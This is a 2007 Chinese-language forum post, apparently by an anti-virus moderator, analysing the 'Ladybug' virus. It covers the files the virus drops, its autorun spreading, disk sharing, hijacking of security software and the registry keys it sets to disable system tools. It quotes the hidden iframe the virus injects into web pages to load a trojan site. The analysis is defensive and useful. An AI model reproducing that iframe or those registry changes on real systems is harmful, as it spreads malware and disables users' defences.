廣告廣告
  加入我的最愛 設為首頁 風格修改
首頁 首尾
 手機版   訂閱   地圖  簡體 
您是第 2149 個閱讀者
 
發表文章 發表投票 回覆文章
  可列印版   加為IE收藏   收藏主題   上一主題 | 下一主題   
upside 手機 葫蘆墩家族
個人頭像
個人文章 個人相簿 個人日記 個人地圖
特殊貢獻獎 社區建設獎 優秀管理員勳章
頭銜:反病毒 反詐騙 反虐犬   反病毒 反詐騙 反虐犬  
版主
分享: 轉寄此文章 Facebook Plurk Twitter 複製連結到剪貼簿 轉換為繁體 轉換為簡體 載入圖片
推文 x0
[病毒蠕蟲] 警惕小瓢蟲病毒
警惕小瓢蟲病毒
這個病毒看起來象熊貓燒香和AV終結者的結合體,陽光以前曾給過一個詳細的分析。如果這個病毒把感染做的完美些(現在病毒還不是真正意義上的感染,是用病毒體完全覆蓋正常EXE),會不會造成和李俊版熊貓燒香一樣的效果呢,完全有可能。

以下是關於該病毒的詳細分析報告:

一.病毒信息

病毒名:Win32.Troj.Serwer.yx

病毒中文名稱:小瓢蟲

二.病毒行爲:

這是一個感染型病毒,把會計算機上的係統時間改爲 2030 年,在係統盤的system32文件夾下釋放多個病毒文件。

在計算機上的每個盤下生成SDGames.exe和Autorun.inf兩個文件,以達到通過雙擊該盤時病毒可以運行起來.

在每個盤下生成三個Url文件,都指向該盤下的SDGame.exe文件,三個Url文件具有迷惑性的圖標。可以查看這三個URL的屬性,會發現都指向c:\sdgame.exe。

通過添加注冊表啓動項以達到開機時病毒能運行起來,通過修改注冊表破壞係統安全模式,禁用大部分係統功能:包括,禁用任務管理器,禁用控制面板,禁止修改係統配置,鎖定主頁,禁用注冊表編輯器等。

映像劫持了大量軟件,被劫持的軟件包括"殺毒軟件","係統檢測工具","QQ",(連QQ都不讓用,這病毒夠BT)
感染計算機上的 exe 文件,感染方式爲覆蓋數據. (除係統盤外,其它盤的EXE都被替換爲小瓢蟲圖標)

感染計算機上的 hta,html,htm,jsp,php,asp 後綴的文件,插入網頁代碼. (除係統盤外,這一點和熊貓燒香的傳播方式相同,有可能會造成網站大面積挂馬)

把計算機上的所有盤設爲所有人完全共享,(這是尼姆達病毒最常用的手段,當然,目的就是在局域網中大面積傳播了。)

病毒運行後釋放以下文件:
    %systemroot%\system32\Taskeep.vbs
    %systemroot%\system32\SDGames.exe
    %systemroot%\system32\Avpser.cmd
    %systemroot%\system32\netshare.cmd
    %systemroot%\system32\AUTORUN.INF

Taskeep.vbs 的作用是運行起病毒進程    

netshare.cmd 的作用是打開本機的共享  

Avpser.cmd 用於結束計算機上的大量殺毒軟件、安全檢測軟件,常見殺毒軟件都在被攻擊之列。

病毒在計算機上的每個盤下生成SDGame.exe和Autorun.inf,並生成Recycleds.url,Windows.url,新建文件夾. url三個文件,誘使用戶雙擊.這三個文件都指向該盤下的SDGame.exe文件.(Recycleds.url 的圖標爲"回收站",其余兩個圖標爲"文件夾圖標")

病毒創建注冊表啓動項,添加服務;

把計算機上爲以下後綴名的文件插入代碼: (除係統盤外)
    ".hta"
    ".html"
    ".htm"
    ".php"
    ".asp"
    ".jsp"
插入的代碼:
  <iframe id="iframe" width="0" height="0" scrolling="no"frameborder="0" src="http://zhida...du.木馬站/" name="Myframe"align="center" border="0">

感染計算機上的 exe 文件,感染方式爲覆蓋數據.(除係統盤,被感染後的 exe 文件圖標爲綠色的小飄蟲)

修改計算機上的 reg 和 txt 文件關聯指向 "%systemroot%\system32\SDGames.exe"

把計算機上的係統時間改爲 2030 年,中國木馬制作者的慣用手法。

通過修改注冊表的方式破壞安全模式.

禁用cmd:
    HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System\DisableCMD

破壞顯示隱藏文件:
    HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue
使得文件擴展名無法顯示:
    HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt
隱藏控制面板:
    HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel
禁用注冊表編輯器:
    HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistrytools
禁用任務管理器:
    HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr
修改IE主頁爲: http:/ /www.zhidaobaidu.木馬站
隱藏文件夾選項:
    HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions

映像劫持常用安全軟件,這次連殺毒軟件的命令行查毒都沒放過



爸爸 你一路好走
獻花 x0 回到頂端 [樓 主] From:臺灣和信超媒體寬帶網 | Posted:2007-12-27 03:21 |

首頁  發表文章 發表投票 回覆文章
Powered by PHPWind v1.3.6
Copyright © 2003-04 PHPWind
Processed in 0.053641 second(s),query:15 Gzip disabled
本站由 瀛睿律師事務所 擔任常年法律顧問 | 免責聲明 | 本網站已依台灣網站內容分級規定處理 | 連絡我們 | 訪客留言